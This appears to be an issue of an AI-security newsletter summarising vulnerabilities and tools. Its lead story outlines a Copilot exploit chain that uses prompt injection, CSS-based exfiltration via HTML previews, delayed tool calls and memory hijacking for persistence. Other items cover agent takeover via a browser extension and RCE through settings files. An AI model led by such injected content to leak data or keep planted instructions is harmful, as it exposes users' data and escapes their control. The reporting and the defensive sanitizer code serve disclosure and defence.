M365 Copilot CVE-2026-24299: Preview to Exfiltration and Persistence
AI Sec News Weekly #8 — 190 sources scanned
In AI systems, ‘read-only’ is rarely read-only. Anything the model can see now can influence what it says or does later — through memory, scheduled actions, or tool calls. That means previews and embeds aren’t passive; they’re inputs with delayed side effects.
I like a simple model: content plane, memory plane, tool plane. Whenever two touch, you’ve created a write. One team learned that the hard way in Copilot this week, where a seemingly harmless viewer turned into both a quiet exfil path and a place to stick around. If “read” equals “write later,” where does the trust boundary actually live? Dive in below.
This Week's Stories
Copirate 365: CVE-2026-24299 Chains Copilot Exfiltration and Persistence
Wunderwuzzi's DEF CON Singapore write-up details CVE-2026-24299 across M365 Copilot, chaining HTML Preview exfil (CSS backgrounds, @font-face) with delayed tool invocation and memory hijacking. The primitives turn Copilot into "SpAIware": prompt-set persistence plus data theft. The post also shows Consumer Copilot Durable Facts abuse and Edge-assisted exfil, with videos and slides. Microsoft patched the issues via MSRC last year.
Why it matters: Once an assistant remembers, prompt injection stops being a one-off leak and becomes durable compromise.
Embrace the Red by wunderwuzzi
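As an added example (not code from the write-up or from Microsoft), a defensive pre-render gate for an HTML preview pane in JavaScript: it lists the CSS constructs named above (background url(), @font-face src) plus @import, which make a renderer fetch a remote URL with no user interaction, and strips them before rendering. The preview origin, the function names and the sample HTML are assumptions.

```javascript
// Added example (not from the write-up or Microsoft): pre-render gate for an
// HTML preview pane. Reports and strips CSS constructs that trigger a remote
// fetch with no user interaction (background url(), @font-face src, @import).
const PREVIEW_ORIGIN = "https://preview.example.invalid"; // assumed preview origin
// Defense in depth for the preview frame: the browser refuses every fetch except data: URLs.
const PREVIEW_CSP = "default-src 'none'; style-src 'unsafe-inline'; img-src data:; font-src data:";
const urlRe = () => /url\(\s*(['"]?)([^'")]+)\1\s*\)/gi;        // fresh regex per use
const importRe = () => /@import\s+(?:url\(\s*)?['"]?([^'")\s;]+)/gi;
// Anything that is not an inline data: URL or same-origin counts as a remote fetch.
function isRemote(ref) {
  const r = ref.trim();
  if (/^data:/i.test(r)) return false;
  try { return new URL(r, PREVIEW_ORIGIN).origin !== PREVIEW_ORIGIN; }
  catch { return true; }  // unparsable reference: treat as remote and block it
}
// CSS text from <style> blocks and style="" attributes (no DOM needed).
function extractCss(html) {
  const out = [];
  for (const m of html.matchAll(/<style[^>]*>([\s\S]*?)<\/style>/gi)) out.push(m[1]);
  for (const m of html.matchAll(/\sstyle\s*=\s*(["'])([\s\S]*?)\1/gi)) out.push(m[2]);
  return out;
}
// Remote URLs the preview would fetch on render, tagged with the triggering construct.
function findCssFetches(html) {
  const hits = [];
  for (const css of extractCss(html)) {
    for (const m of css.matchAll(importRe())) if (isRemote(m[1])) hits.push({ kind: "@import", url: m[1] });
    for (const m of css.matchAll(urlRe())) {
      if (!isRemote(m[2])) continue;
      const before = css.slice(0, m.index);  // inside an open @font-face block?
      const kind = before.lastIndexOf("@font-face") > before.lastIndexOf("}") ? "@font-face src" : "url()";
      hits.push({ kind, url: m[2].trim() });
    }
  }
  return hits;
}
// Same scan, but rewriting: remote url() becomes none, @import rules are dropped.
function stripRemoteCssFetches(html) {
  const clean = (css) => css
    .replace(/@import\s+(?:url\(\s*)?['"]?[^'")\s;]+['"]?\s*\)?[^;]*;?/gi, "")
    .replace(urlRe(), (whole, _q, ref) => (isRemote(ref) ? "none" : whole));
  return html
    .replace(/(<style[^>]*>)([\s\S]*?)(<\/style>)/gi, (_, o, css, c) => o + clean(css) + c)
    .replace(/(\sstyle\s*=\s*)(["'])([\s\S]*?)\2/gi, (_, p, q, css) => p + q + clean(css) + q);
}
// Constructed sample: one remote fetch of each kind plus a harmless data: URL.
const SAMPLE_HTML = `<div style="background:url(https://collector.invalid/bg.png)">hi</div>
<style>@font-face{font-family:f;src:url("https://collector.invalid/f.woff")}
@import "https://collector.invalid/s.css";
p{background:url(data:image/png;base64,AAAA)}</style>`;
```

Serve the sanitized markup in a frame carrying PREVIEW_CSP so a construct the regexes miss still cannot reach the network.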
Bleeding Llama: CVE-2026-7482 Leaks Ollama Process Memory Remotely
Cyera detailed CVE-2026-7482 ("Bleeding Llama"), a heap out-of-bounds read in Ollama's GGUF model loader affecting versions before 0.17.1 (CVSS 9.1). An unauthenticated attacker can POST a crafted GGUF to /api/create to read past heap buffers due to unsafe use in WriteTo(), then exfiltrate the resulting artifact via /api/push. The leak exposes Ollama process memory—env vars, API keys, system prompts, even other users' chats—across an estimated 300k+ exposed servers.
Why it matters: The "local" LLM stack becomes a turnkey secrets siphon the moment it’s on the internet.
Copy Fail: Deterministic Linux LPE Hits Kernels 4.14–6.19.12
Researchers profiled CVE-2026-31431 ("Copy Fail"), a deterministic Linux kernel LPE in algif_aead via AF_ALG that writes four attacker-controlled bytes into the page cache. Kernels 4.14–6.19.12 across Ubuntu, Amazon Linux, RHEL, Debian, SUSE and AlmaLinux are affected. A 732-byte Python exploit reliably flips privileged executables (su/sudo) in memory, enabling container escape, multi-tenant host takeover and CI/CD compromise. Disclosure landed Apr 29, 2026; vendor kernel updates are rolling out.
Why it matters: Any foothold inside a pod now predictably escalates to root on the node, collapsing your isolation story.
Unit 42 by Justin Moore
Tool Spotlight
New repos and releases worth trying.
Snyk Embeds Anthropic's Claude into its AI security platform
Snyk today announced it is leveraging Anthropic's Claude models to help secure software pipelines in an era where frontier AI expands the attack surface faster than teams can manually review. Claude now powers vulnerability discovery, prioritization, and developer-ready remediation across code, open-source dependencies, containers, and AI-generated artifacts.
Why it matters: In AI security, detection was never the bottleneck. By pairing Claude's capabilities with Snyk, enterprises can turn high-fidelity findings into action inside the workflows where software is built.
ARuleCon uses agentic RAG to translate SIEM rules across vendors
Researchers at NUS and Fudan built ARuleCon, a rule‑conversion pipeline that pulls authoritative vendor docs via agentic RAG and sanity‑checks outputs with Python by executing source and target rules in test rigs. It targets Splunk, Microsoft Sentinel, IBM QRadar, Google Chronicle, and RSA NetWitness. The team argues vanilla LLM translation misses vendor‑specific schemas; ARuleCon closes that with retrieval plus consistency tests.
Why it matters: Detection portability stops being hand‑conversion toil, which cuts the silent breakage that creeps in whenever SOCs juggle multiple SIEMs.
The Register Security by Simon Sharwood
LLMForge: build hostile labs for prompt‑injection and agent exploits
SasanLabs dropped LLMForge, an open‑source “AI security gateway” for assembling dynamic LLM vulnerability labs. It’s pitched at prompt‑injection research, exploit simulation, and agent attack experimentation, with a modular gateway model rather than loose notebooks. The repo is very early (5 stars) and light on stack details; language/framework aren’t documented yet, but the use case is clear: stand up a controlled arena to hammer tool‑using agents with untrusted content.
Why it matters: A shared, purpose‑built harness makes adversarial LLM behaviors reproducible and comparable instead of one‑off demos.
GitLab adds Human‑in‑the‑Loop approval nodes to AI Custom Flows
GitLab’s Duo Agent Platform now lets you drop Human‑in‑the‑Loop checkpoints into AI Custom Flows, pausing runs to Approve, Reject, or Modify from the session view. Approvals route and notify through GitLab’s existing systems, adding auditability to agent decisions. It’s aimed at high‑stakes steps—think production deploys or secret rotations—that previously ran uninterrupted.
Why it matters: When the brake pedal lives inside the orchestrator, “autonomous” agents become deployable in places they were previously a non‑starter.
Quick Hits
- Claude Chrome extension bug allows agent takeover (SecurityWeek) — LayerX’s ‘ClaudeBleed’ lets zero‑perm extensions hijack Claude’s Chrome extension and exfiltrate Gmail/Drive/GitHub; Anthropic shipped a partial fix.
- One-click RCE in Claude Code via settings files (The Register Security) — Adversa AI’s TrustFall PoC shows one‑click RCE in Claude Code via malicious .mcp.json/.claude settings (tested on v2.1.114).
- CVSS 10 supply-chain compromise hits gemini-cli package (Pillar Security) — gemini-cli was trojanized in a CVSS 10 supply‑chain attack, per GHSA‑wpqr‑6v78‑jr5g.
- Agent VCR adds time-travel debugging for LLM agents (github.com) — Open‑source Agent VCR lets you rewind, edit state, and resume LLM agent runs.
- LoRA prompt-injection detector released on Hugging Face (Hugging Face) — New LoRA on Qwen3‑0.6B targets prompt‑injection detection (abedegno/prompt‑injection‑classifier‑qwen3‑0p6b).